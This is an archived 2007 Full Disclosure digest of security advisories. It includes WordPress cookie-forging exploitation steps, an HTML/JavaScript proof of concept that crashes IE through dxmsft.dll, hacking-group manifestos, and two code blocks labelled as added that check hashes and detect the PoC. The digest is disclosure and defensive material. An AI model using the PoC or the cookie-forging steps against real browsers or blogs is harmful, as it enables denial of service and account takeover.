Full Disclosure
mailing list archives
From: "LT" <lt () mac hush com>
Date: Mon, 26 Nov 2007 18:54:01 +0100
On Tue, 20 Nov 2007 08:54:18 +0100 full-disclosure-request () lists grok org uk wrote:
Today's Topics:
1. [ MDKSA-2007:225 ] - Updated net-snmp packages fix remote
denial of service vulnerability (security () mandriva com)
2. Wordpress Cookie Authentication Vulnerability (Steven J.
Murdoch)
3. [ GLSA 200711-28 ] Perl: Buffer overflow (Pierre-Yves Rofes)
4. [ MDKSA-2007:226 ] - Updated kernel packages fix multiple
vulnerabilities and bugs (security () mandriva com)
5. H2HC Materials (Rodrigo Rubira Branco (BSDaemon))
6. rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear
php5-pgsql php5-soap php5-xsl (rPath Update Announcements)
7. Multiple stack-based buffer overflows in dxmsft.dll (Elazar
Broad)
8. [ MDKSA-2007:227 ] - Updated poppler packages fix
vulnerabilities (security () mandriva com)
9. [ MDKSA-2007:228 ] - Updated cups packages fix
vulnerabilities (security () mandriva com)
10. Tha Manual. (rchrafe)
11. The Call to Reason (rchrafe)
12. Re: How to become a Computer Security Professional ?
(rchrafe)
13. Re: How to become a Computer Security Professional ?
(rchrafe)
14. Re: How to become a Computer Security Professional ?
(rchrafe)
15. Large Scale MySpace Phishing Attack (Dancho Danchev)
16. Re: Multiple stack-based buffer overflows in dxmsft.dll
(Elazar Broad)
17. Re: so gay huh? (rchrafe)
18. Re: so gay huh? (rchrafe)
----------------------------------------------------------------------
Message: 1
Date: Mon, 19 Nov 2007 11:12:22 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:225 ] - Updated net-snmp
packages fix remote denial of service vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <E1IuB6c-0001Xp-Fv () artemis annvix ca>
_______________________________________________________________________
Mandriva Linux Security Advisory                         MDKSA-2007:225
http://www.mandriva.com/security/
_______________________________________________________________________
Package : net-snmp
Date : November 19, 2007
Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
          Multi Network Firewall 2.0
_______________________________________________________________________
Problem Description:
The SNMP agent in net-snmp 5.4.1 and earlier allows remote attackers to
cause a denial of service (CPU and memory consumption) via a GETBULK
request with a large max-repeaters value.
Updated packages fix this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5846
_______________________________________________________________________
Updated Packages:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com>
------------------------------
Message: 2
Date: Mon, 19 Nov 2007 18:46:37 +0000
From: "Steven J. Murdoch" <fulldisc+Steven.Murdoch () cl cam ac uk>
Subject: [Full-disclosure] Wordpress Cookie Authentication
Vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <20071119184637.GJ1043 () tern cl cam ac uk>
Content-Type: text/plain; charset="us-ascii"
Wordpress Cookie Authentication Vulnerability
Original release date: 2007-11-19
Last revised: 2007-11-19
Latest version:
http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt
CVE ID: <pending>
Source: Steven J. Murdoch <http://www.cl.cam.ac.uk/users/sjm217/>
Systems Affected:
Wordpress 1.5 -- 2.3.1 (including current version, as of 2007-11-19)
Overview:
With read-only access to the Wordpress database, it is possible to
generate a valid login cookie for any account, without resorting to a
brute force attack. This allows a limited SQL injection vulnerability
to be escalated into administrator access.
This vulnerability is known to be actively exploited, hence the
expedited public release.
I. Description
For authentication, the Wordpress user database stores the MD5 hash
of login passwords. A client is permitted access if they can present a
password whose hash matches the stored one.
$ mysql -u wordpress -p wordpress
Enter password: ********
mysql> SELECT ID, user_login, user_pass FROM wp_users;
+----+-------------+----------------------------------+
| ID | user_login  | user_pass                        |
+----+-------------+----------------------------------+
|  1 | admin       | 4cee2c84f6de6d89a4db4f2894d14e38 |
...
Of course, entering your password after each action that requires
authorization would be exceptionally tedious. So, after logging in,
Wordpress presents the client with two cookies:
wordpressuser_6092254072ca971c70b3ff302411aa5f=admin
wordpresspass_6092254072ca971c70b3ff302411aa5f=813cadd8658c4776afbe5de8f304a684
The cookie names contain the MD5 hash (6092...1a5f) of the blog URL.
The value of wordpressuser_... is the login name, and the value of
wordpresspass is the double-MD5 hash of the user password.
Wordpress will permit access to a given user account if the
wordpresspass_... cookie matches the hash of the specified user's
wp_users.user_pass database entry.
In other words, the database contains MD5(password) and the cookie
contains MD5(MD5(password)). It is thus trivial to convert a database
entry into an authentication cookie.
At this point the vulnerability should be clear. If an attacker can
gain read access to the wp_users table, for example due to a publicly
visible backup or SQL injection vulnerability, a valid cookie can be
generated for any account.
This applies even if the user's password is sufficiently complex to
resist brute force and rainbow table attacks. While it should be
computationally infeasible to go backwards from MD5(password) to
password, the attacker needs only to go forwards.
The exploitation steps are therefore:
1) Find the hash of the blog URL: Either just look at the URL, or
   create an account to get a user cookie
2) Read the user_pass entry from wp_users table: Look for
   backups, perform SQL injection, etc...
3) Set the following cookies:
   wordpressuser_<MD5(url)>=admin
   wordpresspass_<MD5(url)>=MD5(user_pass)
4) You have admin access to the blog
II. Impact
A remote attacker, with read access to the password database can gain
administrator rights. This may be used in conjunction with an SQL
injection attack, or after locating a database backup.
An attacker who has alternatively compromised the database of one
Wordpress blog can also gain access to any other whose users have the
same password on both.
III. Solution
No vendor patch is available.
No timeline for a vendor patch has been announced.
Workarounds:
- Protect the Wordpress database, and do not allow backups to be
  released.
- Keep your Wordpress installation up to date. This should reduce the
  risk that your database will be compromised.
- Do not share passwords across different sites.
- If you suspect a database to be compromised, change all passwords
  to different ones. It is not adequate to change the passwords to
  the same ones, since Wordpress does not "salt" [1] the password
  database.
- Remove write permissions on the Wordpress files for the system
  account that the webserver runs as. This will disable the theme
  editor, but make it more difficult to escalate Wordpress
  administrator access into the capability to execute arbitrary code
- Configure the webserver to not execute files in any directory
  writable by the webserver system account (e.g. the upload
  directory).
Potential fixes:
The problem occurs because it is easy to go from the password hash
in the database to a cookie (i.e. the application of MD5 is the wrong
way around). The simplest fix is to store MD5(MD5(password)) in the
database, and make the cookie MD5(password). This still makes it
infeasible to retrieve the password from a cookie, but means that it
is also infeasible to generate a valid cookie from the database
entry.
However, there are other vulnerabilities in the Wordpress cookie and
password handling, which should be resolved too:
- Passwords are unsalted [2], leaving them open to brute force, rainbow
  table and other attacks [3].
- It is impossible to revoke a cookie without changing the user's
  password.
- Cookies do not contain an expiry time, so are always valid (until
  the user's password changes)
- There ought to be an option to limit cookies to a particular
  IP address or range.
References:
[1] http://en.wikipedia.org/wiki/Salt_(cryptography)
[2] http://trac.wordpress.org/ticket/2394
[3] http://www.lightbluetouchpaper.org/2007/11/16/google-as-a-password-cracker/
Timeline:
2007-10-29: security () wordpress org notified; no response
2007-11-02: security () wordpress org notified;
            Confirmation of active exploitation requested by Wordpress
2007-11-02: Confirmation sent; no response
2007-11-19: Advisory released to full-disclosure and BugTraq
--
w: http://www.cl.cam.ac.uk/users/sjm217/
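Added illustration (not code from the advisory above or from WordPress): the two hash arrangements the advisory compares, with a design check of whether read access to the stored column alone is enough to pass the cookie test. The last two functions sketch an expiring, revocable token for the remaining weaknesses the advisory lists; all function names, the '|' token layout and the HMAC-SHA256 choice are assumptions.

```python
import hashlib
import hmac


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def same(a: str, b: str) -> bool:
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


# Arrangement described in the advisory: the database holds MD5(password)
# and the wordpresspass_ cookie holds MD5(MD5(password)).
def legacy_store(password: str) -> str:
    return md5_hex(password)


def legacy_cookie(password: str) -> str:
    return md5_hex(md5_hex(password))


def legacy_verify(cookie: str, stored: str) -> bool:
    return same(cookie, md5_hex(stored))


# The advisory's "simplest fix": swap the two values.
def swapped_store(password: str) -> str:
    return md5_hex(md5_hex(password))


def swapped_cookie(password: str) -> str:
    return md5_hex(password)


def swapped_verify(cookie: str, stored: str) -> bool:
    return same(md5_hex(cookie), stored)


def leak_yields_cookie(stored: str, verify) -> bool:
    """Design check: does read access to the stored column alone pass verify()?

    A reader of the column can replay the value or hash it forwards,
    but cannot invert MD5 to reach anything earlier in the chain.
    """
    return any(verify(c, stored) for c in (stored, md5_hex(stored)))


# Hypothetical token (not WordPress code) covering other weaknesses the
# advisory lists: it carries an expiry time and names a server-side session
# that can be revoked without a password change. Assumes user names and
# session ids never contain '|'.
def issue_token(key: bytes, user: str, session_id: str, expires: int) -> str:
    body = f"{user}|{session_id}|{expires}"
    tag = hmac.new(key, body.encode("utf-8"), hashlib.sha256).hexdigest()
    return f"{body}|{tag}"


def check_token(key: bytes, token: str, live_sessions: dict, now: int) -> bool:
    parts = token.split("|")
    if len(parts) != 4:
        return False
    user, session_id, expires, tag = parts
    body = f"{user}|{session_id}|{expires}"
    expected = hmac.new(key, body.encode("utf-8"), hashlib.sha256).hexdigest()
    if not same(tag, expected):
        return False                      # forged or altered
    if not (expires.isascii() and expires.isdigit()) or int(expires) <= now:
        return False                      # malformed or expired
    return session_id in live_sessions.get(user, set())   # revoked if absent


if __name__ == "__main__":
    pw = "constructed-sample-password"    # constructed sample input
    print("legacy  :", leak_yields_cookie(legacy_store(pw), legacy_verify))
    print("swapped :", leak_yields_cookie(swapped_store(pw), swapped_verify))
```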
------------------------------
Message: 3
Date: Mon, 19 Nov 2007 22:10:42 +0100
From: Pierre-Yves Rofes <py () gentoo org>
Subject: [Full-disclosure] [ GLSA 200711-28 ] Perl: Buffer
overflow
To: gentoo-announce () gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
security-alerts () linuxsecurity com
Message-ID: <4741FBD2.5040609 () gentoo org>
Content-Type: text/plain; charset=ISO-8859-1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200711-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Perl: Buffer overflow
Date: November 19, 2007
Bugs: #198196
ID: 200711-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
A buffer overflow in the Regular Expression engine in Perl possibly
allows for the execution of arbitrary code.
Background
==========
Perl is a stable, cross-platform programming language created by Larry
Wall.
Affected packages
=================
-------------------------------------------------------------------
   Package          /   Vulnerable   /                  Unaffected
-------------------------------------------------------------------
1  dev-lang/perl        < 5.8.8-r4                     >= 5.8.8-r4
Description
===========
Tavis Ormandy and Will Drewry (Google Security Team) discovered a
heap-based buffer overflow in the Regular Expression engine (regcomp.c)
that occurs when switching from byte to Unicode (UTF-8) characters in a
regular expression.
Impact
======
A remote attacker could either entice a user to compile a specially
crafted regular expression or actively compile it in case the script
accepts remote input of regular expressions, possibly leading to the
execution of arbitrary code with the privileges of the user running
Perl.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Perl users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/perl-5.8.8-r4"
References
==========
[ 1 ] CVE-2007-5116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200711-28.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
------------------------------
Message: 4
Date: Mon, 19 Nov 2007 16:41:14 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:226 ] - Updated kernel
packages fix multiple vulnerabilities and bugs
To: full-disclosure () lists grok org uk
Message-ID: <E1IuGEs-0007rF-PH () artemis annvix ca>
_______________________________________________________________________
Mandriva Linux Security Advisory                         MDKSA-2007:226
http://www.mandriva.com/security/
_______________________________________________________________________
Package : kernel
Date : November 19, 2007
Affected: 2008.0
_______________________________________________________________________
Problem Description:
Some vulnerabilities were discovered and corrected in the Linux
2.6 kernel:
The minix filesystem code allows local users to cause a denial of
service (hang) via a malformed minix file stream (CVE-2006-6058).
An integer underflow in the Linux kernel prior to 2.6.23 allows remote
attackers to cause a denial of service (crash) via a crafted SKB length
value in a runt IEEE 802.11 frame when the IEEE80211_STYPE_QOS_DATA
flag is set (CVE-2007-4997).
To update your kernel, please follow the directions located at:
http://www.mandriva.com/en/security/kernelupdate
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6058
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4997
_______________________________________________________________________
Updated Packages:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com>
------------------------------
Message: 5
Date: Mon, 19 Nov 2007 21:14:15 -0000
From: "Rodrigo Rubira Branco (BSDaemon)"
<rodrigo () kernelhacking com>
Subject: [Full-disclosure] H2HC Materials
To: full-disclosure () lists grok org uk
Message-ID: <20071119231415.E4DED8BEEB () mail fjaunet com br>
Content-Type: text/plain; charset="iso-8859-1";
For those who are interested in knowing more about the H2HC conference,
the presentation materials are now online at
http://www.h2hc.org.br/repositorio.php
cya,
Rodrigo (BSDaemon).
--
http://www.kernelhacking.com/rodrigo
Kernel Hacking: If i really know, i can hack
GPG KeyID: 1FCEDEA1
------------------------------
Message: 6
Date: Mon, 19 Nov 2007 15:06:46 -0500
From: rPath Update Announcements <announce-noreply () rpath com>
Subject: [Full-disclosure] rPSA-2007-0242-1 php5 php5-cgi php5-mysql
php5-pear php5-pgsql php5-soap php5-xsl
To: security-announce () lists rpath com,
update-announce () lists rpath com, product-announce () lists rpath com
Cc: lwn () lwn net, full-disclosure () lists grok org uk,
vulnwatch () vulnwatch org, bugtraq () securityfocus com
Message-ID: <4741ecd6.po1y971Bh5Pxcrhi%announce-noreply () rpath com>
Content-Type: text/plain; charset=us-ascii
rPath Security Advisory: 2007-0242-1
Published: 2007-11-19
Products:
rPath Appliance Platform Linux Service 1
rPath Linux 1
Rating: Minor
Exposure Level Classification:
Remote Deterministic Denial of Service
Updated Versions:
php5=conary.rpath.com () rpl:1/5.2.5-1-1
php5-cgi=conary.rpath.com () rpl:1/5.2.5-1-1
php5-mysql=conary.rpath.com () rpl:1/5.2.5-1-1
php5-pear=conary.rpath.com () rpl:1/5.2.5-1-1
php5-pgsql=conary.rpath.com () rpl:1/5.2.5-1-1
php5-soap=conary.rpath.com () rpl:1/5.2.5-1-1
php5-xsl=conary.rpath.com () rpl:1/5.2.5-1-1
rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1943
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4887
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4840
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5900
Description:
Previous versions of the php5 package contain multiple vulnerabilities,
the most serious of which involve several Denial of Service attacks
(application crashes and temporary application hangs). It is not
currently known that these vulnerabilities can be exploited to execute
malicious code.
In its default configuration, rPath Linux 1 does not install php5 and
is thus not vulnerable; however, systems upon which php5 and an exposed
application have been installed may be vulnerable.
http://wiki.rpath.com/Advisories:rPSA-2007-0242
Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
------------------------------
Message: 7
Date: Mon, 19 Nov 2007 17:30:32 -0500 (GMT-05:00)
From: Elazar Broad <elazarb () earthlink net>
Subject: [Full-disclosure] Multiple stack-based buffer overflows in dxmsft.dll
To: "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk>
Message-ID: <30247048.1195511432439.JavaMail.root () elwamui-norfolk.atl.sa.earthlink.net>
Content-Type: text/plain; charset=UTF-8
There are multiple stack overflows in dxmsft.dll version
6.3.2900.3199 (Image DirectX Transforms). This DLL exposes DirectX
Image Transform objects which are safe for scripting. The issue is
with the Color property of certain objects, so I am assuming this
property is inherited from a base interface.
This affects Windows XP SP2 IE6 (fully patched), I have not tested this on
IE7 and it does not appear to affect Windows Server 2003 R2 SP2 (newer
version of the dxmsft.dll). I have not tested code execution, though it
may be possible. I received the following response from Microsoft:
---
From our investigation this issue was found to be a stability
problem which is not exploitable. The net effect of this issue is
that IE will become unresponsive. The underlying operating system
will still respond and Killing the process will stop the local DoS.
---
It did not hang IE on my machine, but instead crashed IE with a
stack overflow.
This may be related to http://www.securityfocus.com/bid/19029/.
PoC as follows:
---------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
    var s = "AAAA";
    while (s.length < 999999) s=s+s;
    var obj = new ActiveXObject("DXImageTransform.Microsoft.Chroma");
    obj.color = s;
    var obj = new ActiveXObject("DXImageTransform.Microsoft.DropShadow");
    obj.color = s;
    var obj = new ActiveXObject("DXImageTransform.Microsoft.Glow");
    obj.color = s;
    var obj = new ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
    obj.color = s;
    var obj = new ActiveXObject("DXImageTransform.Microsoft.Shadow");
    obj.color = s;
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>
---------------------
Elazar
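An added example, not part of the original post and not vendor tooling: a static check that a content filter or triage script could run over page source to flag inline script that instantiates the DirectX Image Transform ProgIDs named in the post and then writes to their color property. The function names, the report shape and the sample page are assumptions constructed for illustration.

```javascript
// Added example (hypothetical names): lexical triage of HTML for script that
// creates the DXImageTransform objects named in the post and assigns .color.

// ProgIDs taken from the post. COM ProgIDs are case-insensitive.
const AFFECTED_PROGIDS = [
  "DXImageTransform.Microsoft.Chroma",
  "DXImageTransform.Microsoft.DropShadow",
  "DXImageTransform.Microsoft.Glow",
  "DXImageTransform.Microsoft.MaskFilter",
  "DXImageTransform.Microsoft.Shadow",
];

// name = new ActiveXObject("ProgID")   (a line break after "new" is allowed)
const BIND = /\b([A-Za-z_$][\w$]*)\s*=\s*new\s+ActiveXObject\s*\(\s*(["'])([^"']+)\2\s*\)/;
// name.color =   (assignment only; "==" comparisons are skipped)
const WRITE = /\b([A-Za-z_$][\w$]*)\s*\.\s*color\s*=(?!=)/;

// Return the text of every <script> element in the page source.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) scripts.push(m[1]);
  return scripts;
}

// Walk each script in source order, tracking which variable currently holds
// an affected object, and report every color write made through it.
function findTransformColorWrites(html) {
  const wanted = new Map(AFFECTED_PROGIDS.map((p) => [p.toLowerCase(), p]));
  const findings = [];
  for (const src of extractScripts(html)) {
    const re = new RegExp(`${BIND.source}|${WRITE.source}`, "gi");
    const bound = new Map(); // variable name -> canonical ProgID
    let m;
    while ((m = re.exec(src)) !== null) {
      if (m[1] !== undefined) {
        const progid = wanted.get(m[3].toLowerCase());
        // Rebinding to an unrelated object clears the earlier association.
        if (progid) bound.set(m[1], progid);
        else bound.delete(m[1]);
      } else if (bound.has(m[4])) {
        findings.push({ variable: m[4], progid: bound.get(m[4]), offset: m.index });
      }
    }
  }
  return findings;
}

// Constructed sample page: benign color values, one unrelated ActiveX object,
// one ordinary style write and one comparison that must not be reported.
const SAMPLE_PAGE = `
<html><head>
<script language="JavaScript">
function init() {
  var glow = new
    ActiveXObject("DXImageTransform.Microsoft.Glow");
  glow.color = "#ff0000";
  var xml = new ActiveXObject("Microsoft.XMLDOM");
  xml.color = "ignored";
  document.body.style.color = "black";
  var sh = new ActiveXObject('dximagetransform.microsoft.shadow');
  if (sh.color == "x") { sh.Color = "#000000"; }
}
</script></head><body onload="init()"></body></html>`;

for (const f of findTransformColorWrites(SAMPLE_PAGE)) {
  console.log(`${f.progid}: color written via "${f.variable}" at offset ${f.offset}`);
}
```

The check is purely lexical and only sees literal ProgID strings in inline script, so a hit is a triage signal rather than a verdict.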
------------------------------
Message: 8
Date: Mon, 19 Nov 2007 19:12:41 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:227 ] - Updated poppler packages fix vulnerabilities
To: full-disclosure () lists grok org uk
Message-ID: <E1IuIbR-0008H5-79 () artemis annvix ca>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDKSA-2007:227
http://www.mandriva.com/security/
_______________________________________________________________________
Package : poppler
Date : November 19, 2007
Affected: 2007.1, 2008.0, Corporate 4.0
_______________________________________________________________________
Problem Description:
Alin Rad Pop found several flaws in how PDF files are handled
in poppler. An attacker could create a malicious PDF file that
would cause poppler to crash or potentially execute arbitrary code
when opened.
The updated packages have been patched to correct this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
_______________________________________________________________________
Updated Packages:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFHQhenmqjQ0CJFipgRAl9SAJ9gU0uhZwFvHZ9tF4z8F15VUgUfNwCgjOhN
XrZ88C4TwK/FkZL+zC+zOLU=
=ehqr
-----END PGP SIGNATURE-----
------------------------------
Message: 9
Date: Mon, 19 Nov 2007 19:23:22 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:228 ] - Updated cups packages fix vulnerabilities
To: full-disclosure () lists grok org uk
Message-ID: <E1IuIlm-0008OR-55 () artemis annvix ca>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDKSA-2007:228
http://www.mandriva.com/security/
_______________________________________________________________________
Package : cups
Date : November 19, 2007
Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________
Problem Description:
Alin Rad Pop found several flaws in how PDF files are handled in cups.
An attacker could create a malicious PDF file that would cause cups
to crash or potentially execute arbitrary code when opened.
The updated packages have been patched to correct this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
_______________________________________________________________________
Updated Packages:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFHQhlDmqjQ0CJFipgRAs6VAJ0Z1CEZIWu9sWiiexjGtC+JUXXXMACgo44W
z5jyh/u/+4QFVsSocymKj/g=
=RkrY
-----END PGP SIGNATURE-----
------------------------------
Message: 10
Date: Tue, 20 Nov 2007 07:09:46 +0100
From: rchrafe <rchrafe () gmail com>
Subject: [Full-disclosure] Tha Manual.
To: full-disclosure () lists grok org uk
Message-ID: <47427A2A.5060905 () gmail com>
Content-Type: text/plain; charset=windows-1252; format=flowed
Tha manual.
We do not care about you, or your affiliates.
We are in position, and a new army has emerged.
The first of a set of manuals, being provided as follows shall be
provided wherein those who maintain an interest in the power of the
simplicity of man.
The Manual
Written by d4rk1v4n, part of the rchrafe crime wave.
Notes: We are the rchrafe, you are pathetic
You must learn assembly.
It must be the breakpoint for any other language, high-level or
low-level and integral learning processes.
It will be assumed that a thorough course in C Programming and Assembly
must first commence.
Also after which a basic, yet thorough understanding of Logic Gates,
which will be provided as articles following the manual.
This guide is a perfected manual, crisp with only the intent to create
an army of elite.
Simply to intervene.
Mod 1: Kernel Design
{
Operating System Concepts Chapters 1-3 5-13
Linux Kernel 2.4 Chapters 1-13
Shellcode
Stack Overflows
Format string exploitation
Integer Overflows
Race Conditions (files)
Kernel Exploitation (Linux)
Kernel patching (Linux)
Kernel rootkit (Linux)
linux process patching
dlmalloc exploitation (partial analysis of 6 thousand line src)
raw sockets, hping2
i/o multiplexing
pthreads
ELF executable format
OS Fingerprinting
IRC Protocol RFC
SMTP Protocol
ICMP Protocol
POP3 protocol
}
Mod 2: Algorithms & Data Structures
{
Computer Organization Hardware/Software Int. chapters 1-6
FreeBSD Design And Implementation chapters 1-6, 8, 12, 13
Algorithms And Data structures (Sedgewick, knuth, whale)
Linux TCPIP Implementation
Linux Synchronization analysis
Linux ext3 analysis
Linux kmalloc analysis
Threads
Mandatory Access Control Models (Selinux,grsec,trustedbsd, dod85)
Role Based Access Control (rsbac for linux)
Buffer overflow Protection
MIPS ASM
Computer Networks - Tanenbaum
C++ (full)
Perl
phkmalloc exploitation
advanced dlmalloc exploitation
advanced fmt string exploitation
advanced race conditions (double free, etc)
freebsd kernel exploitation
freebsd kernel rootkit
cisco protocols (IGRP, EIGRP, BGP, OSPF, IS-IS)
TCP RFC
IP RFC
IPSEC RFC
DNS specification
HTTP specification
IMAP specification
SSL 3 specification
Kerberos
asynch i/o
perl exploitation
php exploitation
sql injection
win32 API
PE executable format
windows ring 3 hacks
IDA/Softice work
binary encryption
polymorphic shellcode
WIN DCOM
ONE RPC Specification
}
Mod 3: Large source analysis
{
400-500 Thousand lines of src analysis
Solaris Kernel internals book
Sparc ASM
windows kernel analysis & exploitation
Prolog
Artificial Intelligence
Compilers
SIMD
ISP Design
Database Design ISBN: 0321204484
Sysvmalloc exploitation
IOS malloc exploitation
RTL malloc exploitation
kmalloc exploitation
ATM
VPN's
DecNet
Cryptography
Linear algebra
}
Level 4: Parallelism, Distributiveness, Diversity
{
OpenVMS Scheduler ISBN: 1555581560
OpenVMS Memory Management ISBN: 1555581595
Real Time Scheduling Design ISBN: 0387231374
HP-UX Kernel internals ISBN: 0130328618
Distributed Operating Systems ISBN: 0132199084
VHDL ISBN: 0471899720
Verilog
Designing a MAC Model (like selinux)
Designing BOF Protection (like PAX)
Parallel Architectures
Parallel Algorithm Design
Advanced Artificial Intelligence
Alpha
PowerPC
PA-RISC
ARM
M68K
OpenVMS using
HP-UX using
Digital Image Processing
Digital Signal Processing
Electrical Engineering Basics
Circuit Board Design
}
The rchrafe will resume tutorials of the Mod 1 on the 1st of December
2007, in the channel #crx under irc.efnet.org/pl/ru
We will not accommodate stupidity.
The key will be revealed on rchrafe.wordpress.com at midnight, the 1st
of December 2007 for all to join!
Well will rise!
------------------------------
Message: 11
Date: Tue, 20 Nov 2007 07:13:02 +0100
From: rchrafe <rchrafe () gmail com>
Subject: [Full-disclosure] The Call to Reason
To: full-disclosure () lists grok org uk
Message-ID: <47427AEE.2060404 () gmail com>
Content-Type: text/plain; charset=windows-1252; format=flowed
"The Call to Reason."
By the rchrafe Senior seat of officials.
BEHOLD AND WITNESS, those who read this document, this which
is the official PROCLAMATION and LETTER OF INTENT concerning
the future of RCHRAFE and RCHRAFE member states; the words within
are no less than the movement of RCHRAFE from its widely
admired position in the computer underground to an overt
existence as a world renowned hacking into computer machines
authority.
REGARDING the current social state of hacking into computer
machines, RCHRAFE takes no stance. As an autonomous body
with goals unrelated to what is largely considered "the
hacking community", RCHRAFE recognizes no entities nor social
classes other than RCHRAFE and anti-RCHRAFE. Abstract concepts
such as "black hat" and "white hat" do thus not exist in
the lexicon of RCHRAFE politics, and are irrelevant to our goals.
What then, are the goals and motivations of this powerful
force that has developed over the years, that has come
to be known as RCHRAFE? No less than the subjugation of
power in the computer machine community. It is at this
